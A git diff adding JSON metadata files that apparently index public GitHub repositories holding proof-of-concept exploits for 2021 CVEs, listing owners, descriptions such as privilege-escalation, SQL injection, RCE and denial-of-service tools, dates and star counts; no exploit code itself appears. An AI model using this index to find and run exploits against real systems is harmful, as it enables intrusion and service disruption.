+ "description": "2021 kernel vulnerability in Ubuntu.",
+ "fork": false,
+ "created_at": "2021-09-12T12:25:02Z",
+ "updated_at": "2024-01-24T23:44:02Z",
+ "pushed_at": "2021-09-12T19:54:47Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 412824012,
+ "name": "CVE-2021-3493",
+ "full_name": "puckiestyle\/CVE-2021-3493",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-02T14:44:43Z",
+ "updated_at": "2023-01-10T03:23:13Z",
+ "pushed_at": "2021-10-02T14:44:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 544564976,
+ "name": "CVE-2021-3493",
+ "full_name": "Senz4wa\/CVE-2021-3493",
+ "owner": {
+ "login": "Senz4wa",
+ "id": 82728308,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82728308?v=4",
+ "html_url": "https:\/\/github.com\/Senz4wa"
+ },
+ "html_url": "https:\/\/github.com\/Senz4wa\/CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-02T19:44:45Z",
+ "updated_at": "2022-10-02T19:45:20Z",
+ "pushed_at": "2022-10-02T19:45:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 572048993,
+ "name": "CVE-2021-3493",
+ "full_name": "fei9747\/CVE-2021-3493",
+ "owner": {
+ "login": "fei9747",
+ "id": 37730810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37730810?v=4",
+ "html_url": "https:\/\/github.com\/fei9747"
+ },
+ "html_url": "https:\/\/github.com\/fei9747\/CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-11-29T12:56:00Z",
+ "updated_at": "2022-11-30T06:04:21Z",
+ "pushed_at": "2022-11-29T12:56:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 589425086,
+ "name": "OverlayFS-CVE-2021-3493",
+ "full_name": "pmihsan\/OverlayFS-CVE-2021-3493",
+ "owner": {
+ "login": "pmihsan",
+ "id": 89512452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89512452?v=4",
+ "html_url": "https:\/\/github.com\/pmihsan"
+ },
+ "html_url": "https:\/\/github.com\/pmihsan\/OverlayFS-CVE-2021-3493",
+ "description": "Exploit For OverlayFS ",
+ "fork": false,
+ "created_at": "2023-01-16T04:29:39Z",
+ "updated_at": "2023-07-24T09:41:05Z",
+ "pushed_at": "2023-01-16T04:34:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3493",
+ "file-system-vulnerability",
+ "overlay-fs"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 643372099,
+ "name": "CVE-2021-3493",
+ "full_name": "smallkill\/CVE-2021-3493",
+ "owner": {
+ "login": "smallkill",
+ "id": 19218766,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19218766?v=4",
+ "html_url": "https:\/\/github.com\/smallkill"
+ },
+ "html_url": "https:\/\/github.com\/smallkill\/CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-21T00:14:40Z",
+ "updated_at": "2023-05-21T00:15:16Z",
+ "pushed_at": "2023-05-21T00:15:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 682926321,
+ "name": "OverlayFS---CVE-2021-3493",
+ "full_name": "ptkhai15\/OverlayFS---CVE-2021-3493",
+ "owner": {
+ "login": "ptkhai15",
+ "id": 94296191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94296191?v=4",
+ "html_url": "https:\/\/github.com\/ptkhai15"
+ },
+ "html_url": "https:\/\/github.com\/ptkhai15\/OverlayFS---CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-25T07:26:35Z",
+ "updated_at": "2023-08-25T07:41:07Z",
+ "pushed_at": "2023-08-25T07:41:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35042.json b/2021/CVE-2021-35042.json
new file mode 100644
index 0000000000..4b5643bb3f
--- /dev/null
+++ b/2021/CVE-2021-35042.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 384694670,
+ "name": "CVE-2021-35042",
+ "full_name": "YouGina\/CVE-2021-35042",
+ "owner": {
+ "login": "YouGina",
+ "id": 5002624,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5002624?v=4",
+ "html_url": "https:\/\/github.com\/YouGina"
+ },
+ "html_url": "https:\/\/github.com\/YouGina\/CVE-2021-35042",
+ "description": "SQL injection via unsanitized QuerySet.order_by() input",
+ "fork": false,
+ "created_at": "2021-07-10T12:38:52Z",
+ "updated_at": "2024-06-25T06:40:43Z",
+ "pushed_at": "2021-07-10T13:43:54Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402138788,
+ "name": "CVE-2021-35042",
+ "full_name": "mrlihd\/CVE-2021-35042",
+ "owner": {
+ "login": "mrlihd",
+ "id": 77404450,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77404450?v=4",
+ "html_url": "https:\/\/github.com\/mrlihd"
+ },
+ "html_url": "https:\/\/github.com\/mrlihd\/CVE-2021-35042",
+ "description": "Reproduce CVE-2021-35042",
+ "fork": false,
+ "created_at": "2021-09-01T16:59:42Z",
+ "updated_at": "2021-09-18T03:17:20Z",
+ "pushed_at": "2021-09-18T03:16:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 410014595,
+ "name": "CVE-2021-35042",
+ "full_name": "r4vi\/CVE-2021-35042",
+ "owner": {
+ "login": "r4vi",
+ "id": 565628,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/565628?v=4",
+ "html_url": "https:\/\/github.com\/r4vi"
+ },
+ "html_url": "https:\/\/github.com\/r4vi\/CVE-2021-35042",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-24T15:30:25Z",
+ "updated_at": "2022-06-03T05:45:29Z",
+ "pushed_at": "2022-02-10T16:43:22Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485202008,
+ "name": "CVE-2021-35042",
+ "full_name": "zer0qs\/CVE-2021-35042",
+ "owner": {
+ "login": "zer0qs",
+ "id": 83699106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83699106?v=4",
+ "html_url": "https:\/\/github.com\/zer0qs"
+ },
+ "html_url": "https:\/\/github.com\/zer0qs\/CVE-2021-35042",
+ "description": "A basic analysis about CVE-2021-35942. SQL injection in Django.",
+ "fork": false,
+ "created_at": "2022-04-25T02:50:00Z",
+ "updated_at": "2023-06-27T01:32:32Z",
+ "pushed_at": "2022-04-29T02:16:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 642158825,
+ "name": "CVE-2021-35042",
+ "full_name": "LUUANHDUC\/CVE-2021-35042",
+ "owner": {
+ "login": "LUUANHDUC",
+ "id": 125422094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125422094?v=4",
+ "html_url": "https:\/\/github.com\/LUUANHDUC"
+ },
+ "html_url": "https:\/\/github.com\/LUUANHDUC\/CVE-2021-35042",
+ "description": "Django SQL injection vulnerability",
+ "fork": false,
+ "created_at": "2023-05-18T00:35:20Z",
+ "updated_at": "2023-05-18T00:36:36Z",
+ "pushed_at": "2023-05-18T00:40:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35064.json b/2021/CVE-2021-35064.json
new file mode 100644
index 0000000000..e25ffcaaa4
--- /dev/null
+++ b/2021/CVE-2021-35064.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 498962746,
+ "name": "CVE-2021-35064",
+ "full_name": "Chocapikk\/CVE-2021-35064",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2021-35064",
+ "description": "Python script to exploit CVE-2021-35064 and CVE-2021-36356",
+ "fork": false,
+ "created_at": "2022-06-02T02:19:49Z",
+ "updated_at": "2023-12-19T12:11:16Z",
+ "pushed_at": "2022-06-02T17:29:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3516.json b/2021/CVE-2021-3516.json
new file mode 100644
index 0000000000..c40e0c62e1
--- /dev/null
+++ b/2021/CVE-2021-3516.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386162783,
+ "name": "CVE-2021-3516",
+ "full_name": "dja2TaqkGEEfA45\/CVE-2021-3516",
+ "owner": {
+ "login": "dja2TaqkGEEfA45",
+ "id": 82131630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4",
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45"
+ },
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-3516",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-15T04:29:56Z",
+ "updated_at": "2021-07-15T04:29:56Z",
+ "pushed_at": "2021-07-15T04:29:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35211.json b/2021/CVE-2021-35211.json
new file mode 100644
index 0000000000..89fa19e10a
--- /dev/null
+++ b/2021/CVE-2021-35211.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 411886593,
+ "name": "Serv-U-CVE-2021-35211",
+ "full_name": "NattiSamson\/Serv-U-CVE-2021-35211",
+ "owner": {
+ "login": "NattiSamson",
+ "id": 45117900,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45117900?v=4",
+ "html_url": "https:\/\/github.com\/NattiSamson"
+ },
+ "html_url": "https:\/\/github.com\/NattiSamson\/Serv-U-CVE-2021-35211",
+ "description": "Simple Serv-U CVE-2021-35211 PoC",
+ "fork": false,
+ "created_at": "2021-09-30T01:45:42Z",
+ "updated_at": "2024-03-05T16:34:39Z",
+ "pushed_at": "2021-09-30T01:46:00Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420609702,
+ "name": "CVE-2021-35211",
+ "full_name": "0xhaggis\/CVE-2021-35211",
+ "owner": {
+ "login": "0xhaggis",
+ "id": 6735009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4",
+ "html_url": "https:\/\/github.com\/0xhaggis"
+ },
+ "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2021-35211",
+ "description": "Serv-U-FTP CVE-2021-35211 exploit",
+ "fork": false,
+ "created_at": "2021-10-24T06:51:16Z",
+ "updated_at": "2024-04-22T06:37:05Z",
+ "pushed_at": "2021-11-12T23:31:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 447857478,
+ "name": "CVE-2021-35211",
+ "full_name": "BishopFox\/CVE-2021-35211",
+ "owner": {
+ "login": "BishopFox",
+ "id": 4523757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4",
+ "html_url": "https:\/\/github.com\/BishopFox"
+ },
+ "html_url": "https:\/\/github.com\/BishopFox\/CVE-2021-35211",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-14T05:52:17Z",
+ "updated_at": "2024-01-30T07:26:22Z",
+ "pushed_at": "2022-01-14T05:56:09Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35215.json b/2021/CVE-2021-35215.json
new file mode 100644
index 0000000000..4657865f94
--- /dev/null
+++ b/2021/CVE-2021-35215.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 420286323,
+ "name": "CVE-2021-35215",
+ "full_name": "Y4er\/CVE-2021-35215",
+ "owner": {
+ "login": "Y4er",
+ "id": 40487319,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4",
+ "html_url": "https:\/\/github.com\/Y4er"
+ },
+ "html_url": "https:\/\/github.com\/Y4er\/CVE-2021-35215",
+ "description": "SolarWinds Orion Platform ActionPluginBaseView 反序列化RCE",
+ "fork": false,
+ "created_at": "2021-10-23T01:35:42Z",
+ "updated_at": "2024-06-08T01:00:04Z",
+ "pushed_at": "2021-10-23T01:44:54Z",
+ "stargazers_count": 47,
+ "watchers_count": 47,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 47,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35250.json b/2021/CVE-2021-35250.json
new file mode 100644
index 0000000000..2cdc54bf79
--- /dev/null
+++ b/2021/CVE-2021-35250.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 627256634,
+ "name": "SolarWinds-CVE-2021-35250",
+ "full_name": "rissor41\/SolarWinds-CVE-2021-35250",
+ "owner": {
+ "login": "rissor41",
+ "id": 37665001,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37665001?v=4",
+ "html_url": "https:\/\/github.com\/rissor41"
+ },
+ "html_url": "https:\/\/github.com\/rissor41\/SolarWinds-CVE-2021-35250",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-13T05:13:38Z",
+ "updated_at": "2023-09-28T11:45:51Z",
+ "pushed_at": "2023-04-14T05:58:48Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35296.json b/2021/CVE-2021-35296.json
new file mode 100644
index 0000000000..3957be05a0
--- /dev/null
+++ b/2021/CVE-2021-35296.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 412175760,
+ "name": "CVE-2021-35296",
+ "full_name": "afaq1337\/CVE-2021-35296",
+ "owner": {
+ "login": "afaq1337",
+ "id": 45089292,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45089292?v=4",
+ "html_url": "https:\/\/github.com\/afaq1337"
+ },
+ "html_url": "https:\/\/github.com\/afaq1337\/CVE-2021-35296",
+ "description": "PoC of CVE-2021-35296 - PTCL Modem HG150-Ub",
+ "fork": false,
+ "created_at": "2021-09-30T18:18:27Z",
+ "updated_at": "2022-07-15T05:19:10Z",
+ "pushed_at": "2023-12-31T06:38:34Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35448.json b/2021/CVE-2021-35448.json
new file mode 100644
index 0000000000..22c4bdc5e8
--- /dev/null
+++ b/2021/CVE-2021-35448.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 652119437,
+ "name": "cve-2021-35448",
+ "full_name": "deathflash1411\/cve-2021-35448",
+ "owner": {
+ "login": "deathflash1411",
+ "id": 42869390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42869390?v=4",
+ "html_url": "https:\/\/github.com\/deathflash1411"
+ },
+ "html_url": "https:\/\/github.com\/deathflash1411\/cve-2021-35448",
+ "description": "Local Privilege Escalation in Remote Mouse 3.008",
+ "fork": false,
+ "created_at": "2023-06-11T06:32:12Z",
+ "updated_at": "2023-06-11T13:06:16Z",
+ "pushed_at": "2023-06-11T13:05:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35464.json b/2021/CVE-2021-35464.json
new file mode 100644
index 0000000000..82859b211a
--- /dev/null
+++ b/2021/CVE-2021-35464.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 381902138,
+ "name": "openam-CVE-2021-35464",
+ "full_name": "Y4er\/openam-CVE-2021-35464",
+ "owner": {
+ "login": "Y4er",
+ "id": 40487319,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4",
+ "html_url": "https:\/\/github.com\/Y4er"
+ },
+ "html_url": "https:\/\/github.com\/Y4er\/openam-CVE-2021-35464",
+ "description": "openam-CVE-2021-35464 tomcat 执行命令回显",
+ "fork": false,
+ "created_at": "2021-07-01T03:51:32Z",
+ "updated_at": "2024-05-21T08:51:10Z",
+ "pushed_at": "2022-12-15T00:35:40Z",
+ "stargazers_count": 88,
+ "watchers_count": 88,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 88,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 398670596,
+ "name": "CVE-2021-35464",
+ "full_name": "rood8008\/CVE-2021-35464",
+ "owner": {
+ "login": "rood8008",
+ "id": 49926338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49926338?v=4",
+ "html_url": "https:\/\/github.com\/rood8008"
+ },
+ "html_url": "https:\/\/github.com\/rood8008\/CVE-2021-35464",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-21T22:53:39Z",
+ "updated_at": "2021-08-21T22:58:42Z",
+ "pushed_at": "2021-08-21T22:58:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35475.json b/2021/CVE-2021-35475.json
new file mode 100644
index 0000000000..8961896604
--- /dev/null
+++ b/2021/CVE-2021-35475.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 380110029,
+ "name": "CVE-2021-35475",
+ "full_name": "saitamang\/CVE-2021-35475",
+ "owner": {
+ "login": "saitamang",
+ "id": 41514973,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41514973?v=4",
+ "html_url": "https:\/\/github.com\/saitamang"
+ },
+ "html_url": "https:\/\/github.com\/saitamang\/CVE-2021-35475",
+ "description": "Writeup for CVE-2021-35475; Stored Cross-Site Scripting(XSS) on SAS® Environment Manager 2.5",
+ "fork": false,
+ "created_at": "2021-06-25T03:08:44Z",
+ "updated_at": "2022-07-22T12:56:15Z",
+ "pushed_at": "2022-07-24T15:39:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35492.json b/2021/CVE-2021-35492.json
new file mode 100644
index 0000000000..e4f89ac18b
--- /dev/null
+++ b/2021/CVE-2021-35492.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 414366264,
+ "name": "CVE-2021-35492",
+ "full_name": "N4nj0\/CVE-2021-35492",
+ "owner": {
+ "login": "N4nj0",
+ "id": 76006964,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76006964?v=4",
+ "html_url": "https:\/\/github.com\/N4nj0"
+ },
+ "html_url": "https:\/\/github.com\/N4nj0\/CVE-2021-35492",
+ "description": "Denial of Service tool for Wowza Streaming Engine <= 4.8.11+5 - Uncontrolled Resource Consumption (CVE-2021-35492)",
+ "fork": false,
+ "created_at": "2021-10-06T20:53:00Z",
+ "updated_at": "2021-10-06T21:21:59Z",
+ "pushed_at": "2021-10-06T21:21:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35576.json b/2021/CVE-2021-35576.json
new file mode 100644
index 0000000000..1a0e673892
--- /dev/null
+++ b/2021/CVE-2021-35576.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 502415385,
+ "name": "CVE-2021-35576",
+ "full_name": "emad-almousa\/CVE-2021-35576",
+ "owner": {
+ "login": "emad-almousa",
+ "id": 48997609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4",
+ "html_url": "https:\/\/github.com\/emad-almousa"
+ },
+ "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2021-35576",
+ "description": "CVE-2021-35576",
+ "fork": false,
+ "created_at": "2022-06-11T17:36:01Z",
+ "updated_at": "2022-06-11T17:36:01Z",
+ "pushed_at": "2022-06-11T17:37:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35587.json b/2021/CVE-2021-35587.json
new file mode 100644
index 0000000000..95d2092fcd
--- /dev/null
+++ b/2021/CVE-2021-35587.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 469587526,
+ "name": "CVE-2021-35587",
+ "full_name": "antx-code\/CVE-2021-35587",
+ "owner": {
+ "login": "antx-code",
+ "id": 7877940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7877940?v=4",
+ "html_url": "https:\/\/github.com\/antx-code"
+ },
+ "html_url": "https:\/\/github.com\/antx-code\/CVE-2021-35587",
+ "description": "Oracle Access Manager Unauthenticated Attacker Vulnerability CVE-2021-35587",
+ "fork": false,
+ "created_at": "2022-03-14T05:03:54Z",
+ "updated_at": "2024-06-13T21:25:35Z",
+ "pushed_at": "2022-03-14T05:07:01Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3560.json b/2021/CVE-2021-3560.json
new file mode 100644
index 0000000000..768d291e17
--- /dev/null
+++ b/2021/CVE-2021-3560.json
@@ -0,0 +1,784 @@
+[
+ {
+ "id": 376019552,
+ "name": "polkit-auto-exploit",
+ "full_name": "aancw\/polkit-auto-exploit",
+ "owner": {
+ "login": "aancw",
+ "id": 6284204,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6284204?v=4",
+ "html_url": "https:\/\/github.com\/aancw"
+ },
+ "html_url": "https:\/\/github.com\/aancw\/polkit-auto-exploit",
+ "description": "Automatic Explotation PoC for Polkit CVE-2021-3560",
+ "fork": false,
+ "created_at": "2021-06-11T12:33:56Z",
+ "updated_at": "2023-09-18T20:53:40Z",
+ "pushed_at": "2021-08-24T04:51:30Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 376051053,
+ "name": "polkadots",
+ "full_name": "swapravo\/polkadots",
+ "owner": {
+ "login": "swapravo",
+ "id": 68004413,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68004413?v=4",
+ "html_url": "https:\/\/github.com\/swapravo"
+ },
+ "html_url": "https:\/\/github.com\/swapravo\/polkadots",
+ "description": "CVE-2021-3560 Local PrivEsc Exploit",
+ "fork": false,
+ "created_at": "2021-06-11T14:28:43Z",
+ "updated_at": "2023-11-03T09:33:02Z",
+ "pushed_at": "2021-06-12T17:48:38Z",
+ "stargazers_count": 77,
+ "watchers_count": 77,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
